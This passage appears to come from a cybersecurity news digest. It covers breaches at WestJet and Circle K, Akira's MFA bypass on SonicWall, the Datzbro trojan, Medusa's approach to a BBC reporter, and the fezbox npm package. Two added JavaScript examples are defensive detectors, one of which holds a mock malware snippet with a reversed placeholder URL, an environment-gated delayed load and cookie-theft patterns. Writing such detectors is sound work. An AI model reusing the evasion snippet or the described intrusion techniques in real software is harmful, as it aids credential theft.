“Many breaches occur because of poor risk management and the absence of a clear response strategy,” he said. “Regular monitoring can prevent many of these problems.” 

Dr Akhlaghpour also advised businesses not to pay ransoms if they fall victim to an attack. “You cannot trust criminals. Paying the ransom rarely restores data and often leads to further targeting. Stolen data is frequently resold on the dark web,” he warned. 

Authorities continue to monitor the situation in Toowoomba as cybersecurity experts remind small business owners across Australia to take preventive measures and strengthen their defences against the growing threat of ransomware.

WestJet Confirms Cyberattack Exposed Passenger Data but No Financial Details

 

WestJet has confirmed that a cyberattack in June compromised certain passenger information, though the airline maintains that the breach did not involve sensitive financial or password data. The incident, which took place on June 13, was attributed to a “sophisticated, criminal third party,” according to a notice issued by the airline to U.S. residents earlier this week. 

WestJet stated that its internal precautionary measures successfully prevented the attackers from gaining access to credit and debit card details, including card numbers, expiry dates, and CVV codes. The airline further confirmed that no user passwords were stolen. However, the company acknowledged that some passengers’ personal information had been exposed. The compromised data included names, contact details, information and documents related to reservations and travel, and details regarding the passengers’ relationship with WestJet. 

“Containment is complete, and additional system and data security measures have been implemented,” WestJet said in an official release. The airline emphasized that analysis of the incident is still ongoing and that it continues to strengthen its cybersecurity framework to safeguard customer data. 

As part of its response plan, WestJet is contacting affected customers to offer support and guidance. The airline has partnered with Cyberscout, a company specializing in identity theft protection and fraud assistance, to help impacted individuals with remediation services. WestJet has also published advisory information on its website to assist passengers who may be concerned about their data.  

In its statement, the airline reassured customers that swift containment measures limited the breach’s impact. “Our cybersecurity teams acted immediately to contain the situation and secure our systems. We take our responsibility to protect customer information very seriously,” the company said. 

WestJet confirmed that it is working closely with law enforcement agencies, including the U.S. Federal Bureau of Investigation (FBI) and the Canadian Centre for Cyber Security. The airline also notified U.S. credit reporting agencies—TransUnion, Experian, and Equifax—along with the attorneys general of several U.S. states, Transport Canada, the Office of the Privacy Commissioner of Canada, and relevant provincial and international data protection authorities. 

While WestJet maintains that the exposed information does not appear to include sensitive financial or authentication details, cybersecurity experts note that personal identifiers such as names and contact data can still pose privacy and fraud risks if misused. The airline’s transparency and engagement with regulatory agencies reflect an effort to mitigate potential harm and restore public trust. 

The company reiterated that it remains committed to improving its security posture through enhanced monitoring, employee training, and the implementation of additional cybersecurity controls. The investigation into the breach continues, and WestJet has promised to provide further updates as new information becomes available. 

The incident highlights the ongoing threat of cyberattacks against the aviation industry, where companies hold large volumes of personal and travel-related data. Despite the rise in security investments, even well-established airlines remain attractive targets for sophisticated cybercriminals. WestJet’s quick response and cooperation with authorities underscore the importance of rapid containment and transparency in handling such data breaches.

Akira Ransomware Bypasses MFA in Ongoing Attacks on SonicWall SSL VPN Devices

 

The Akira ransomware group continues to evolve its attacks on SonicWall SSL VPN devices, with researchers warning that the threat actors are managing to log into accounts even when one-time password (OTP) multi-factor authentication (MFA) is enabled. Cybersecurity firm Arctic Wolf reported that attackers appear to be exploiting previously stolen OTP seeds or a similar method to bypass MFA, though the exact technique remains unclear. 

Earlier this year, Akira was observed exploiting SonicWall SSL VPN devices to breach corporate networks. Initially, researchers suspected a zero-day vulnerability was involved. However, SonicWall later attributed the incidents to an improper access control flaw identified as CVE-2024-40766, disclosed in September 2024. The flaw had been patched in August 2024, but attackers continued to exploit stolen credentials from compromised devices even after updates were applied. SonicWall advised administrators to reset all VPN credentials and update to the latest SonicOS firmware.  

The latest Arctic Wolf findings reveal a persistent campaign in which multiple OTP challenges were triggered before successful logins, implying that attackers may be generating valid OTP tokens using previously harvested OTP seeds. The company confirmed that these logins were linked to devices affected by CVE-2024-40766, suggesting that stolen credentials remain a key entry point.
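The pattern Arctic Wolf describes, several OTP challenges in a short window followed by a successful login, is something an administrator can look for in VPN authentication logs. The following is an added example, not code from the article, Arctic Wolf or SonicWall: it runs a simple detection over a few constructed log lines. The log format and field names (`user=`, `src=`, `event=`) are assumptions made for this example and do not follow the real SonicOS syslog schema; a practitioner would adapt `LINE_RE` to the appliance's actual output.

```javascript
// Added example (not from the article, Arctic Wolf or SonicWall): flag VPN
// accounts that received several OTP challenges in a short window and then
// logged in successfully, the pattern the report associates with harvested
// OTP seeds. Log format and field names are constructed for this example.

// Constructed sample log: jdoe passes after three challenges in 17 seconds,
// asmith passes normally after one, bob never logs in successfully.
const SAMPLE_LOG = `
2025-10-02T08:14:03Z user=jdoe src=203.0.113.7 event=otp_challenge
2025-10-02T08:14:09Z user=jdoe src=203.0.113.7 event=otp_challenge
2025-10-02T08:14:15Z user=jdoe src=203.0.113.7 event=otp_challenge
2025-10-02T08:14:20Z user=jdoe src=203.0.113.7 event=login_success
2025-10-02T09:00:00Z user=asmith src=198.51.100.4 event=otp_challenge
2025-10-02T09:00:08Z user=asmith src=198.51.100.4 event=login_success
2025-10-02T10:30:00Z user=bob src=192.0.2.9 event=otp_challenge
2025-10-02T10:30:05Z user=bob src=192.0.2.9 event=otp_challenge
2025-10-02T10:45:00Z user=bob src=192.0.2.9 event=login_failure
`;

// Assumed line layout: ISO timestamp, then user=, src=, event= fields.
const LINE_RE = /^(\S+)\s+user=(\S+)\s+src=(\S+)\s+event=(\S+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null; // blank or unrecognised line
  const ts = Date.parse(m[1]);
  if (Number.isNaN(ts)) return null;
  return { ts, user: m[2], src: m[3], event: m[4] };
}

// Returns one finding per successful login that was preceded by at least
// `minChallenges` OTP challenges for the same user within `windowSeconds`.
function findSeedReplayCandidates(logText, { windowSeconds = 300, minChallenges = 2 } = {}) {
  const events = logText
    .split("\n")
    .map(parseLine)
    .filter(Boolean)
    .sort((a, b) => a.ts - b.ts);

  // user -> timestamps of challenges not yet followed by a successful login
  const pending = new Map();
  const findings = [];

  for (const ev of events) {
    const list = pending.get(ev.user) ?? [];
    if (ev.event === "otp_challenge") {
      list.push(ev.ts);
    } else if (ev.event === "login_success") {
      const recent = list.filter((t) => ev.ts - t <= windowSeconds * 1000);
      if (recent.length >= minChallenges) {
        findings.push({
          user: ev.user,
          src: ev.src,
          challenges: recent.length,
          loginAt: new Date(ev.ts).toISOString(),
        });
      }
      list.length = 0; // the login closes the sequence
    }
    pending.set(ev.user, list);
  }
  return findings;
}

// Stand-alone run: prints the flagged account(s) from the sample log.
console.log(findSeedReplayCandidates(SAMPLE_LOG));
```

One challenge followed by one success is the normal shape of an OTP login, so a single challenge is never flagged; a run of re-issued challenges that nevertheless ends in success is the signal worth reviewing, together with the source address. The window and threshold are arguments so they can be tuned to the appliance's real challenge timing, and any hit on a device that ran vulnerable firmware is a strong reason to follow the credential reset advice given above.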

In a related investigation, Google’s Threat Intelligence Group (GTIG) observed a similar campaign in July, where a financially motivated group known as UNC6148 deployed the OVERSTEP rootkit on SonicWall SMA 100 series appliances. GTIG assessed that the attackers were using stolen one-time password seeds from earlier zero-day intrusions, allowing continued access even after organizations patched their systems. 

Once Akira gained access to networks, the attackers moved rapidly, often initiating internal scans within minutes. According to Arctic Wolf, they used Impacket SMB session requests, Remote Desktop Protocol (RDP) logins, and Active Directory enumeration tools like dsquery, SharpShares, and BloodHound to expand their reach. A major focus was on Veeam Backup & Replication servers, where a custom PowerShell script extracted and decrypted stored MSSQL and PostgreSQL credentials. 

To disable endpoint protection, Akira affiliates executed a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, using Microsoft’s legitimate consent.exe executable to sideload malicious DLLs that deployed vulnerable drivers such as rwdrv.sys and churchill_driver.sys. These drivers were then used to terminate security processes, enabling the ransomware to encrypt systems undetected. 

The report notes that some compromised systems were running SonicOS 7.3.0, the very version recommended by SonicWall to mitigate such attacks. Security experts urge all administrators to reset VPN credentials and review access logs on any devices that previously used vulnerable firmware, as threat actors may still exploit stolen data to infiltrate networks.

NATO Rift Widens Over Response to Russian Cyber Threats

 

NATO is confronting significant internal divisions over how to handle the intensifying wave of Russian cyberattacks, divisions that expose rifts in alliance strategy and threaten the alliance’s coherence and overall deterrence posture. 

As Russia increasingly targets NATO states’ critical infrastructure, governmental functions, and even military networks, debate has raged within the alliance as to how forcefully to respond, and under what terms, to hostile state-sponsored cyber activities.

Deepening divisions 

A core challenge for NATO is divergent national approaches to what constitutes an act of cyber aggression warranting collective response. Some member states—particularly those along Russia’s borders in the Baltics, as well as Poland—are calling for robust measures, including invoking Article 4 (consultative action in response to threats), and even considering proportional offensive cyber operations against Russian state targets. 

These nations see repeated Russian provocations, from cyber to airspace incursions, as clear tests of alliance resolve that demand a stiff and highly visible response.

However, other countries, such as France and Germany, worry about the risks of escalation and advocate a more cautious, defensive posture, preferring extensive evidence gathering, attribution efforts, and diplomatic engagement before considering retaliatory action. 

They argue frequent consultations or aggressive stances could water down NATO’s deterrent signal or trigger dangerous unintended escalation. This split produces tactical uncertainty and delays, potentially emboldening adversaries and hampering a unified alliance front.

Policy stalemate and its consequences

These diverging approaches are mirrored in ongoing arguments about when and how to use NATO’s cyber capabilities offensively versus limiting the alliance to defensive postures or coordinated resilience initiatives. 

While some strategists press for disruptive cyber operations or overt information warfare campaigns targeting Russia, consensus is lacking due to legal concerns, worries about thresholds for collective defense, and varying levels of national cyber capacity and risk appetite.

Strategic implications

Analysts warn that Russia’s overt cyber and hybrid threats are, in part, designed to exploit and widen these strategic rifts, stymying meaningful joint response and putting both NATO's credibility and European security at risk. Persistent internal divisions leave NATO vulnerable, raising pressure for the alliance to develop a clearer, more decisive policy on cyber deterrence and response.

Circle K Confirms Cyberattack in Hong Kong, Services Still Disrupted

 

Circle K has confirmed that its Hong Kong operations were hit by a cyberattack, a week after the convenience store chain suspended most electronic payment services. The company has apologized to affected customers and assured the public that the incident is now “under control” while investigations continue.

The disruption began by affecting electronic payments across 400 stores citywide, except transactions made through the Octopus card. The following day, the company revealed it was facing network problems and did not rule out a cyberattack. A spokesperson confirmed it was indeed a network attack, but did not clarify whether customer data had been compromised.

Despite all stores remaining open, several key services remain suspended, including parcel collection, e-wallet top-ups, bill payments, and the loyalty rewards program. Octopus payments and cash transactions are still being accepted. Circle K has also notified law enforcement authorities and engaged cybersecurity experts to assist with the recovery.

Customers have voiced frustration on social media over the company’s slow response, asking for clearer updates and alternative arrangements. Some requested temporary manual solutions for parcel collection and clarity on whether loyalty program stamps and rewards would remain valid.

The Office of the Privacy Commissioner for Personal Data (PCPD) confirmed it received a data breach notification on September 23 from Couche-Tard HK Limited, Circle K’s parent company. The PCPD has launched a compliance check to investigate potential risks to personal data.

Cybersecurity expert Francis Fong Po-kiu suggested that Circle K may have fallen victim to a ransomware attack, in which hackers infiltrate systems, encrypt data, and demand payment for a decryption key. “They might be working to find the loophole, to find out whether something went wrong in the server or on the retail front,” he said, warning that full recovery could take months or even years. He added that while it was uncertain if customer data had been leaked, loyalty program details such as names, emails, and phone numbers could be at risk.

World’s Largest 22.2Tbps DDoS Attack and Rogue SIM Network Busted by US Secret Service

 

Earlier this month, reports highlighted a massive 11.5Tbps DDoS attack — the largest on record at the time. However, that figure was quickly overshadowed this week when a new distributed denial-of-service strike reached an unprecedented 22.2Tbps, transmitting 10.6 billion packets per second. The assault, although lasting just 40 seconds, showcased the immense scale and power of today’s botnets. 

Experts warn that as these malicious networks expand, future DDoS attacks will likely grow even more destructive, targeting vulnerable companies and platforms worldwide.

In another alarming case, the US Secret Service dismantled a rogue cellular network made up of more than 100,000 SIM cards. The network, which was spread across several physical sites, was strategically positioned ahead of the UN General Assembly in New York City.

Investigators revealed the operation aimed to carry out attacks against diplomats and officials, including DDoS campaigns, deepfaked calls, and even “swatting” attempts — where false bomb or violence threats are reported to law enforcement to provoke an armed response. Doxxing, exposing private personal details, was also among the threats.

These incidents serve as stark reminders of how critical it is to safeguard personal data. Yet, protecting your information is increasingly challenging in a digital economy where data brokers profit from collecting and selling detailed profiles. 

Even everyday apps, from Duolingo to Candy Crush, harvest user data. On the positive side, individuals can take action by requesting data deletion directly from brokers or by using specialized personal data removal services.

Microsoft Probes Outlook Bug Blocking Encrypted Emails Across Tenants

 

Microsoft is investigating a newly identified issue that prevents users of the classic Outlook client from opening encrypted emails sent by other organizations. 

The company confirmed the problem in a recently updated support document, noting that the bug affects customers across all Office release channels. 

According to Microsoft, users attempting to access such emails may encounter the error message: “Configuring your computer for Information Rights Management.” The glitch impacts OMEv2 (Office Message Encryption version 2) messages when sent across different tenants, creating disruptions for enterprise communication. 

Temporary workaround provided 

While the root cause is still under review, Microsoft has issued a temporary fix. Impacted organizations can either exclude external users from Conditional Access policies or enable cross-tenant settings that allow authentication tokens to be trusted between Entra tenants. 

The company recommends the second option as the simpler solution. Administrators can enable cross-tenant access by navigating to the “Inbound access settings – Default settings” page in the Microsoft Entra admin center, selecting “Trust settings,” and then enabling “Trust multifactor authentication from Microsoft Entra tenants.” 

Microsoft cautioned, however, that this workaround only ensures encrypted emails sent from an organization can be opened by others. 

To access encrypted messages received from a different tenant, the sending organization must also apply the same configuration. 

Ongoing investigation 

The Outlook and Purview teams are currently working on a permanent resolution. 

Microsoft has assured customers that updates will be shared once more information is available. 

This is the latest in a string of Outlook-related bugs addressed by Redmond (Microsoft’s global headquarters) this year. 

In June, the company resolved a crash affecting the classic Outlook client when opening or composing emails. Later, in August, it mitigated an Exchange Online issue that blocked mobile users relying on Hybrid Modern Authentication. 

With encrypted communications becoming central to enterprise security, a swift resolution will be crucial to ensure seamless cross-tenant collaboration.

Datzbro Android Banking Trojan Targets Seniors With Device-Takeover Attacks

 

Researchers have uncovered a previously undocumented Android banking trojan, dubbed Datzbro, that is being used in device-takeover campaigns aimed squarely at older adults. ThreatFabric, a Dutch mobile security firm, first tied the activity to a social-engineering network in August 2025 after reports emerged of Facebook groups in Australia advertising “active senior trips” that were in fact recruitment channels for the scam. The operation has been observed in multiple countries, including Singapore, Malaysia, Canada, South Africa and the U.K., and relies on community-focused messaging to build trust before delivering malware. 

The attackers create convincing Facebook groups and AI-generated posts promoting local events for seniors. When a target shows interest, operators move the conversation to Facebook Messenger or WhatsApp and push a link to download a so-called community app—usually an APK hosted on a fraudulent domain. Those sites promise event registration and networking features but deliver an installer that either installs Datzbro directly or drops a secondary loader built with an APK-binding service called Zombinder, which helps bypass protections introduced in Android 13 and later. Some evidence suggests the fraudsters are preparing iOS TestFlight lures as well, indicating cross-platform ambitions. 

Analysts have cataloged multiple malicious app package names used to distribute the trojan, from innocuous-sounding “Senior Group” and “Lively Years” to variants masquerading as popular Chinese apps or tools. Once installed, Datzbro grants itself extensive permissions and weaponizes Android accessibility services to perform actions on behalf of the attacker. It can record audio, capture photos, harvest files, log keystrokes and overlay semi-transparent screens to hide malicious activity from victims. A distinctive feature is its “schematic remote control” mode, which reports screen layout, element positions and content back to operators so they can reconstruct interfaces remotely and direct the device as if they were looking over the victim’s shoulder. 

The trojan also filters accessibility event logs for bank or wallet package names and scans for text resembling PINs, passwords or transaction codes. If it finds credentials in cookies or other storage, Datzbro exfiltrates them to the attackers’ back end; it can even steal lock-screen PINs and compromise popular Chinese payment apps such as Alipay and WeChat. ThreatFabric noted Chinese debug strings and a Chinese-language desktop command-and-control application tied to the campaign, suggesting the authors are Chinese-speaking. A compiled C2 client reportedly leaked to public malware repositories, which may accelerate wider abuse by other criminals. 

Datzbro’s discovery comes amid broader mobile-banking malware activity. IBM X-Force has described a related AntiDot campaign called PhantomCall that similarly abuses Android features and sideloaded droppers to bypass modern OS protections, while PRODAFT has documented MaaS-style offerings for actors aiming at global banks. Together, these trends reflect a sustained move toward targeted social engineering that exploits community trust to coax vulnerable users into installing powerful remote-control malware. 

The rapid evolution of these threats underscores the need for heightened public awareness—especially among seniors—tighter app-distribution controls, and stronger defenses around accessibility permissions and sideloaded software.

Medusa Ransomware Gang Offers BBC Reporter Millions for Inside Hack Access

 

A ransomware operation claiming affiliation with the Medusa gang attempted to recruit BBC cybersecurity correspondent Joe Tidy as an insider threat, offering him substantial financial incentives in exchange for access to the broadcaster's systems. 

The threat actor, using the alias "Syndicate" (later shortened to "Syn"), contacted Tidy in July via the encrypted messaging app Signal, proposing an arrangement that would give him a percentage of the ransom proceeds. The initial proposition involved offering Tidy 15% of any ransom payment if he provided access to his work laptop and BBC systems. 

The cybercriminals planned to infiltrate the organization's network, exfiltrate sensitive data, and demand payment in cryptocurrency while threatening to release stolen information. As negotiations continued, Syn increased the offer to 25%, suggesting the total ransom demand could reach tens of millions of dollars and claiming Tidy "wouldn't need to work ever again".

To establish credibility, the threat actor offered 0.5 Bitcoin (approximately $55,000) as an upfront trust payment through escrow on a hacker forum. Syn referenced previous successful insider recruitment operations, citing cases involving a UK healthcare company and a US emergency services provider, suggesting such collaborations were common in their operations.

The Medusa ransomware operation has operated since January 2021 and evolved from a closed operation to a ransomware-as-a-service model with affiliates. According to a March report from CISA, the gang has compromised over 300 critical infrastructure organizations in the United States. The operation's core developers recruit initial access brokers through cybercrime forums and darknet marketplaces while maintaining central control over ransom negotiations.

Tidy, who reports on cybersecurity topics, believes the attackers likely mistook him for a technical employee with elevated system privileges rather than a journalist. After consulting with BBC editors, he engaged with the threat actor to gather intelligence on their methods. When Tidy delayed responding to their demands, the criminals launched an MFA bombing attack, flooding his phone with two-factor authentication requests in an attempt to force approval of a malicious login.

The journalist promptly contacted BBC's information security team and was disconnected from the organization's infrastructure as a precautionary measure. Following several days of silence from Tidy, the alleged Medusa representative deleted their Signal account.

Fezbox npm Package Uses QR Codes to Deliver Cookie-Stealing Malware

 

A malicious npm package called fezbox was recently uncovered using an unusual trick: it pulls a dense QR code image from the attacker’s server and decodes that barcode to deliver a second-stage payload that steals browser cookies and credentials. Published to the npm registry and posing as a harmless utility library, the package relied on steganography and evasion techniques to hide its true purpose. By the time registry administrators removed it, fezbox had recorded hundreds of installs. 

Analysis by the Socket Threat Research Team shows the core malicious logic lives in the package’s distributed file, where minified code waits for production-like conditions before acting. That staged behavior is deliberate: the malware checks for development environments and other telltale signs of sandboxing, remaining dormant during analysis to avoid detection. After a short delay, the code reconstructs a reversed string that resolves to a Cloudinary URL hosting a JPG. That image contains an unusually dense QR code, not intended for human scanners but encoded with obfuscated instructions the package can parse automatically. 

Storing the image URL in reverse is a simple but effective evasion move. By reversing the string, the attackers reduced the chance that static scanners flag a plain http(s) link embedded in the code. Once the package decodes the QR, the embedded payload extracts document.cookie values and looks for username and password entries. If both items are present, the stolen credentials are sent via HTTPS POST to a command-and-control endpoint under the attacker’s control; if not, the package quietly exits. In short, fezbox converts an image fetch into a covert channel for credential exfiltration that looks like routine media traffic to many network monitoring tools. 

This technique represents an evolution from earlier image-based steganography because it uses the QR barcode itself as the delivery vessel for parseable code rather than hiding data in image metadata or color channels. That makes the abuse harder to spot: a proxy or IDS that permits image downloads will often treat the fetch as normal content, while the malicious decoding and execution occur locally in the runtime environment. The QR’s data density intentionally defeats casual scanning by phone, so human users will not notice anything suspicious even if they try to inspect the image. 

The fezbox incident underscores how open-source ecosystems can be abused via supply-chain vectors that combine code trojanization with clever obfuscation. Attackers can publish seemingly useful packages, wait for installs, and then activate hidden logic that reaches out for seemingly benign resources such as images or configuration files. Defenders should monitor package provenance, scan installed dependencies for unusual network calls, and enforce least-privilege policies that limit what third-party modules can access at runtime. Registry maintainers and developers alike must also treat media-only traffic with healthy suspicion, since seemingly innocuous image downloads can bootstrap highly targeted exfiltration channels. 

As attacks become more creative, detection approaches must move beyond signature checks and look for behaviors such as unexpected decodes, remote fetches of unusual image content, and suspicious POSTs to new domains. The fezbox campaign is a reminder that any medium — even a QR code embedded in a JPG — can be repurposed as a covert communications channel when code running on a developer’s machine is allowed to fetch and interpret it.
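The reversed-string trick described above defeats a scanner that only greps dependencies for `http://` or `https://`, but it is cheap to catch once you know to look for it. The following is an added example, not fezbox's code and not Socket's tooling: a small static check that extracts every string literal from a package's source, reverses it and tests for a URL, and also looks for the companion tells mentioned in the article (the `split("").reverse().join("")` idiom, execution gated on the environment, a long `setTimeout` delay, and reads of `document.cookie`). Both input snippets are constructed for this example with placeholder domains; they are not the real package's source.

```javascript
// Added example (not fezbox's code or Socket's tooling): static indicators
// for the reversed-URL evasion and the staged behaviour the article describes.

// Constructed stage-one sample in the style of the described package.
// Placeholder domain; not the real fezbox source. The literal on the first
// line is "https://example.invalid/qrcode.jpg" written backwards.
const SUSPICIOUS_SAMPLE = `
const a="gpj.edocrq/dilavni.elpmaxe//:sptth";
const u=a.split("").reverse().join("");
setTimeout(()=>{if(process.env.NODE_ENV!=="production")return;load(u);},120000);
`;

// Constructed benign sample: a plain URL in the open, no gating, no delay.
const BENIGN_SAMPLE = `
const HOMEPAGE="https://example.invalid/docs";
module.exports=function fmt(s){return s.trim();};
`;

const URL_RE = /https?:\/\//i;
// Single-, double- or backtick-quoted literal without a newline inside.
const STRING_LITERAL_RE = /(["'`])((?:\\.|(?!\1)[^\\\n])*)\1/g;
const REVERSE_IDIOM_RE = /\.split\(\s*(["'`])\1\s*\)\s*\.reverse\(\)\s*\.join\(\s*(["'`])\2\s*\)/;
const ENV_GATE_RE = /process\.env\.NODE_ENV/;
const TIMEOUT_RE = /setTimeout\s*\(([\s\S]*?),\s*(\d+)\s*\)/g;
const COOKIE_RE = /document\.cookie/;

// Every string literal whose reversal is an http(s) URL.
function reversedUrls(source) {
  const hits = [];
  for (const m of source.matchAll(STRING_LITERAL_RE)) {
    const reversed = [...m[2]].reverse().join("");
    if (URL_RE.test(reversed)) hits.push(reversed);
  }
  return hits;
}

// Returns whether a plain URL is visible to a naive grep, the decoded
// reversed URLs, and a list of human-readable indicators.
function scanSource(source, { minDelayMs = 60000 } = {}) {
  const indicators = [];
  const urls = reversedUrls(source);
  if (urls.length) indicators.push(`reversed URL literal: ${urls.join(", ")}`);
  if (REVERSE_IDIOM_RE.test(source)) indicators.push("split/reverse/join string reversal");
  if (ENV_GATE_RE.test(source)) indicators.push("execution gated on NODE_ENV");
  for (const m of source.matchAll(TIMEOUT_RE)) {
    if (Number(m[2]) >= minDelayMs) indicators.push(`delayed execution: setTimeout ${m[2]} ms`);
  }
  if (COOKIE_RE.test(source)) indicators.push("reads document.cookie");
  return { plainUrlVisible: URL_RE.test(source), reversedUrls: urls, indicators };
}

// Stand-alone run: the suspicious sample shows no plain URL to a naive grep
// but four indicators; the benign sample shows a plain URL and none.
console.log(scanSource(SUSPICIOUS_SAMPLE));
console.log(scanSource(BENIGN_SAMPLE));
```

The point of the comparison is that `plainUrlVisible` is false for the suspicious sample, which is exactly why a URL-only scanner would pass it, while the benign file has its URL in the open and trips none of the behavioural indicators. A check like this belongs in the pre-install or CI stage, run over the distributed (minified) file rather than the repository source, since that is where the article says the staged logic lives.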